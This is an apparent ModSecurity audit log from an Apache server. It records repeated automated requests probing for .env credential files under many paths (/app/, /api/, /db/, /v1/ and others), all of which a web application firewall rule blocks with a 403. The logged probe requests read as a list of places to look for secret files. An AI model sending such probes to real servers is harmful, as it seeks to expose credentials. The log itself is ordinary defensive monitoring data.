Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c2c11b-Z-- --b38ce426-A-- [01/May/2025:07:21:07 +0700] aBK-c-VeTgVPHjrSAYC9AQAAAAQ 103.236.140.4 60430 103.236.140.4 8181 --b38ce426-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Accept-Charset: utf-8 --b38ce426-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b38ce426-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746058867700837 839 (- - -) Stopwatch2: 1746058867700837 839; combined=366, p1=311, p2=0, p3=0, p4=0, p5=55, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b38ce426-Z-- --1af51f16-A-- [01/May/2025:07:50:07 +0700] aBLFP4144kZ4LAGlEgyk4AAAANg 103.236.140.4 38896 103.236.140.4 8181 --1af51f16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --1af51f16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1af51f16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746060607483660 813 (- - -) Stopwatch2: 1746060607483660 813; combined=331, p1=294, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1af51f16-Z-- --678e803d-A-- [01/May/2025:07:51:01 +0700] aBLFdcVMAgMJpNzaVtJlOAAAAEU 103.236.140.4 39110 103.236.140.4 8181 --678e803d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept-Charset: utf-8 --678e803d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --678e803d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746060661221255 748 (- - -) Stopwatch2: 1746060661221255 748; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --678e803d-Z-- --c8bad145-A-- [01/May/2025:08:02:19 +0700] aBLIG8VMAgMJpNzaVtJmrwAAAEA 103.236.140.4 41730 103.236.140.4 8181 --c8bad145-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Accept-Charset: utf-8 --c8bad145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8bad145-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746061339469668 930 (- - -) Stopwatch2: 1746061339469668 930; combined=342, p1=288, p2=0, p3=0, p4=0, p5=54, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8bad145-Z-- --62dbfe7e-A-- [01/May/2025:08:06:16 +0700] aBLJCOVeTgVPHjrSAYC_bAAAAAc 103.236.140.4 42640 103.236.140.4 8181 --62dbfe7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --62dbfe7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62dbfe7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746061576977067 842 (- - -) Stopwatch2: 1746061576977067 842; combined=392, p1=352, p2=0, p3=0, p4=0, p5=40, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62dbfe7e-Z-- --92734324-A-- [01/May/2025:10:01:43 +0700] aBLkF-VeTgVPHjrSAYD7egAAAAs 103.236.140.4 42100 103.236.140.4 8181 --92734324-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.77.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.77.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92734324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92734324-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746068503143052 690 (- - -) Stopwatch2: 1746068503143052 690; combined=263, p1=225, p2=0, p3=0, p4=0, p5=38, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92734324-Z-- --4c4ef271-A-- [01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUQAAAI0 103.236.140.4 49068 103.236.140.4 8181 --4c4ef271-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4c4ef271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c4ef271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930537907 839 (- - -) Stopwatch2: 1746069930537907 839; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c4ef271-Z-- --2a0a3802-A-- [01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUwAAAIE 103.236.140.4 49086 103.236.140.4 8181 --2a0a3802-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2a0a3802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a0a3802-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930737608 563 (- - -) Stopwatch2: 1746069930737608 563; combined=196, p1=174, p2=0, p3=0, p4=0, p5=22, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a0a3802-Z-- --ad074920-A-- [01/May/2025:10:25:30 +0700] aBLpqsVMAgMJpNzaVtKqZAAAAEc 103.236.140.4 49096 103.236.140.4 8181 --ad074920-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ad074920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad074920-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930937310 772 (- - -) Stopwatch2: 1746069930937310 772; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad074920-Z-- --f607fa5c-A-- [01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZQAAAEk 103.236.140.4 49106 103.236.140.4 8181 --f607fa5c-B-- GET /code/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f607fa5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f607fa5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931136965 821 (- - -) Stopwatch2: 1746069931136965 821; combined=343, p1=309, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f607fa5c-Z-- --5ba65174-A-- [01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZgAAAEI 103.236.140.4 49116 103.236.140.4 8181 --5ba65174-B-- GET /db/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5ba65174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ba65174-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931337490 774 (- - -) Stopwatch2: 1746069931337490 774; combined=280, p1=242, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ba65174-Z-- --469b3c5e-A-- [01/May/2025:10:25:31 +0700] aBLpqygtr0Qsi1mFAsMIVAAAAI8 103.236.140.4 49126 103.236.140.4 8181 --469b3c5e-B-- GET /login/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --469b3c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --469b3c5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931536927 865 (- - -) Stopwatch2: 1746069931536927 865; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --469b3c5e-Z-- --d363ff10-A-- [01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfAAAANM 103.236.140.4 49140 103.236.140.4 8181 --d363ff10-B-- GET /api_v1/go/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d363ff10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d363ff10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931739050 861 (- - -) Stopwatch2: 1746069931739050 861; combined=353, p1=309, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d363ff10-Z-- --98a93b64-A-- [01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfwAAAMU 103.236.140.4 49150 103.236.140.4 8181 --98a93b64-B-- GET /api_v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --98a93b64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98a93b64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931939554 799 (- - -) Stopwatch2: 1746069931939554 799; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98a93b64-Z-- --255d3573-A-- [01/May/2025:10:25:32 +0700] aBLprI144kZ4LAGlEgzxgQAAANE 103.236.140.4 49160 103.236.140.4 8181 --255d3573-B-- GET /api_v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --255d3573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --255d3573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069932139893 828 (- - -) Stopwatch2: 1746069932139893 828; combined=276, p1=242, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --255d3573-Z-- --8874fe7f-A-- [01/May/2025:10:25:32 +0700] aBLprMVMAgMJpNzaVtKqawAAAE0 103.236.140.4 49170 103.236.140.4 8181 --8874fe7f-B-- GET /api_v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8874fe7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8874fe7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069932340054 671 (- - -) Stopwatch2: 1746069932340054 671; combined=263, p1=238, p2=0, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8874fe7f-Z-- --a51c691b-A-- [01/May/2025:10:25:33 +0700] aBLprSgtr0Qsi1mFAsMIVgAAAIY 103.236.140.4 49214 103.236.140.4 8181 --a51c691b-B-- GET /v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a51c691b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a51c691b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069933255655 869 (- - -) Stopwatch2: 1746069933255655 869; combined=362, p1=316, p2=0, p3=0, p4=0, p5=46, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a51c691b-Z-- --af574005-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqdwAAAEE 103.236.140.4 49262 103.236.140.4 8181 --af574005-B-- GET /v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --af574005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af574005-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934171514 653 (- - -) Stopwatch2: 1746069934171514 653; combined=239, p1=209, p2=0, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
